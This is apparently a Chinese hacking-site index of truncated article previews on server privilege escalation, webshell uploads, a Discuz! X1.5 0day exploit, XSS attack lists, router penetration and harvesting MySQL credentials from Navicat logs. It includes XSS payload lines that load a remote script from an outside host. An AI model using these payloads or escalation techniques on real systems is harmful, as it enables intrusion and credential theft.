检测某IDC服务器 从入侵提权谈主机防御
文章作者:过客 前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。 目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u 目标网站:Ecshop2.7x 提权: 通常步骤 1、 上传asp webshell检测可用组件,端口,目录。 2、 上传aspx webhsell 测试执行命令,获取进程、服务、端口信息 入手 Echo...
2011黑帽大会:由黑客操控的世界
7 月30日至8月4日,一年一度的黑帽大会在拉斯维加斯召开。黑帽大会一直被公认为是信息安全领域的顶级盛会,在预测与描述未来信息安全形势的能力方面,它的权威性更是独一无二的。本届黑帽大会依旧没有让参与者与围观者失望,它再次汇聚了来自世界各地的企业、政府、学术界及“地下”信息安全组织的思想领袖。在这个专业与技术水平极高的平台上,黑客们正在向人们展示操控世界的技术。你的房子可能被攻破 植物大战僵尸不仅仅...
流氓软件,病毒木马瞄上安卓平台
近日,很多购买水货安卓手机的用户会发现,当手机到手后,已经装了很多形形色色的软件。 但是比如手机qq,uc浏览器之类的,不能删除,也不能升级,这都还好,要命的是还有大 量的不明来路的软件,悄悄在后台运行,不仅非常耗电,甚至让电池极度的发热。 而这一切问题的根源,则全部由当前火热的手机系统——android系统引起。根据调查数据显示 ,在亚洲市场,Android的市场份额已经超越了Symbian,成...
Discuz! X1.5爆0day漏洞 建议升级2.0版本
近日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞,据说利用此漏洞可以上传php木马。建议Discuz! X1.5升级2.0版本。 以下为黑客公布的Discuz! X1.5 0day 利用方法: 把下面内容保存为exp.php 在php环境下运行 php exp.php <?php print_r(' +-------------------...
backtrack常用渗透命令
whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通。 dig 域名/ip 查看域名解析的详细信息。 host -l 域名 dns服务器 传输zone。 查询信息的网站: http://centralops.net http://www.dnsstuff.com http://serversniff.net http://news.netcraft.com...
Mambo CMS 4.6.x (4.6.5) SQL注射缺陷及修复
========================================= Mambo CMS 4.6.x (4.6.5) | SQL Injection ========================================= 1.概述 Mambo CMS 4.6.5及更低版本含注射缺陷 2. 背景 Mambo is a full-featured, award-winning...
77种XSS跨站脚本攻击
1)普通的XSS JavaScript注入 <script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script> (2)IMG标签XSS使用JavaScript命令 <script type="text/javascript" src="http://webshell.cc/XSS/x...
突破ACL表过滤进行提权
一日从朋友处得到一网站权限,让我帮忙提权。拿到后看了看,C、D盘有只读权限,C:\Documents and Settings\All Users\Documents 可写。 没有装FTP软件和数据库。wscript.shell没有被禁用, 终端端口被改成45678 。试了试从外网连不上45678端口,用LCX也导不出来,本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限...
渗透底层路由技术 渗透底层路由简化入侵过程
掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等。。若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话,可以制为代理跳板,仿伪攻击等。可以说这是一种"高水平"的黑客技术手段。 首先,我们要准备的东西:"SolarWinds.Engineers.Toolset"。 我们先来打开Cisco Tools里的"IP Network browser"输入我们要扫描的I...
利用navicat提权
navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到 有两个方法提权: . 1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到C:\My Documents\Navicat\MySQLlogs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt 2、navicat管理的MySQL服务器信息(一般是root帐户)是存在...